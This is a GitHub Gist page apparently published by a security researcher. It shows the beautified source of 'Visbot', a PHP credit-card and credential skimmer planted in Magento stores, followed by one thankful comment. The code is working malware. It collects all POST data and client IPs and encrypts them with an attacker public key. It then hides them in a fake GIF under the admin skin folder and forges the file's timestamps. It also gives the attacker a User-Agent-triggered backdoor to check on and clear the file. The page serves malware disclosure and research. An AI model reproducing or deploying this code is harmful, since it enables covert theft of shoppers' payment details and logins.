Instantly share code, notes, and snippets.

Embed
What would you like to do?
visbot-beautified.php
<?PHP
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif';
$m1 = '1382961301';
$k2 = 'pa89785e';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
if (isset($_GET[$k2])) {
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
@file_put_contents($y0, '');
@touch($y0, $m1, $m1);
echo 'clean ok';
} else
echo 'Pong';
exit;
}
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$i4 = @$_SERVER['REMOTE_ADDR'];
}
if (isset($_POST) && sizeof($_POST)) {
$a5 = '';
foreach ($_POST as $h6 => $n7) {
if (is_array($n7)) {
foreach ($n7 as $f8 => $l9) {
if (is_array($l9)) {
foreach ($l9 as $l10 => $v11) {
if (is_array($v11)) {
;
} else {
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
}
}
} else {
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
}
}
} else {
$a5 .= ':' . $h6 . '=' . $n7;
}
}
$a5 = $i4 . $a5;
} else {
$a5 = null;
}
if ($a5) {
$t12 = false;
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
} elseif (function_exists('dl')) {
$n13 = strtolower(substr(php_uname(), 0, 3));
$d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so');
@dl($d14);
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
}
}
if ($t12) {
$t15 = @openssl_get_publickey($k3);
$q16 = 128;
$t17 = '';
$h18 = md5(md5(microtime()) . rand());
$e19 = $h18;
while ($e19) {
$f20 = substr($e19, 0, $q16);
$e19 = substr($e19, $q16);
@openssl_public_encrypt($f20, $h21, $t15);
$t17 .= $h21;
}
$t22 = @openssl_encrypt($a5, 'aes128', $h18);
@openssl_free_key($t15);
$a5 = $t17 . ':::SEP:::' . $t22;
}
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
@touch($y0, $m1, $m1);
}
?><?php
@invalidquery

This comment has been minimized.

Show comment
Hide comment
@invalidquery

invalidquery Dec 2, 2016

Thank you for publicizing this Willem, keep up the great research work!

invalidquery commented Dec 2, 2016

Thank you for publicizing this Willem, keep up the great research work!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment